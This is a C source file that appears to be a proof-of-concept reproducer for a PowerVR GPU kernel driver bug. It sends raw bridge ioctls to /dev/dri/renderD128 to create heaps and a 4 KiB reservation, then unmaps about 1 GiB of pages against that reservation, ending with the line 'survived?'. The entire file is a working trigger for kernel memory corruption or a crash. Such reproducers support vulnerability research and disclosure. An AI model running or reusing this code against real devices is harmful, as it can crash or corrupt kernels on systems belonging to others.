#include <err.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/ioctl.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440

static int gpu_fd;
static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})
#define do_driver_cmd_ignore(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) printf(#bridge_func_id " eError %u\n", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint32_t IMG_UINT32;
typedef int PVRSRV_ERROR;

#define PVRSRV_BRIDGE_MM 6
#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE 21
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE_TAG
{
	uint64_t sAddress;
	uint64_t uiLength;
	IMG_HANDLE hDevmemServerHeap;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE_TAG
{
	IMG_HANDLE hReservation;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
	uint64_t sHeapBaseAddr; //ignored
	uint64_t uiHeapLength; //ignored
	IMG_HANDLE hDevmemCtx;
	uint32_t ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
	IMG_HANDLE hDevmemHeapPtr;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
	int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
	IMG_HANDLE hDevMemServerContext;
	IMG_HANDLE hPrivData;
	int eError;
	unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPAGES 25
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPAGES_TAG
{
	IMG_DEV_VIRTADDR sDevVAddr;
	IMG_HANDLE hReservation;
	IMG_UINT32 ui32PageCount;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPAGES;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPAGES_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPAGES;

static IMG_HANDLE create_device_memory_context(void) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  printf("cache line: %u bytes\n", out.ui32CPUCacheLineSize);
  // TODO ignoring private data subhandle
  return out.hDevMemServerContext;
}

static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, unsigned int page_size_log2) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE in = {
    .sAddress = base, .uiLength = len, .hDevmemServerHeap = heap
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE);
  return out.hReservation;
}

static void unmap_pages(uint64_t vaddr, IMG_HANDLE resv, uint32_t page_count) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPAGES in = {
    .sDevVAddr = vaddr,
    .hReservation = resv,
    .ui32PageCount = page_count
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPAGES out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPAGES);
}

int main(void) {
  setbuf(stdout, NULL);
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

  IMG_HANDLE mem_ctx = create_device_memory_context();
  IMG_HANDLE heap_4k = create_heap(mem_ctx, 12);
  IMG_HANDLE heap_1m = create_heap(mem_ctx, 12+8);

  IMG_HANDLE resv = create_reservation(heap_4k, 0, 0x1000 /* size = 4KiB */);
  IMG_HANDLE resv_1m = create_reservation(heap_1m, 2ULL*1024*1024 /* addr = 2MiB */, 1024ULL*1024*1024 - 1024*1024 /* size = 1GiB - 1MiB */);
  unmap_pages(0, resv, (1024ULL*1024*1024) / 0x1000 - 1 /* 1GiB - 1KiB */);

  printf("survived?\n");
}
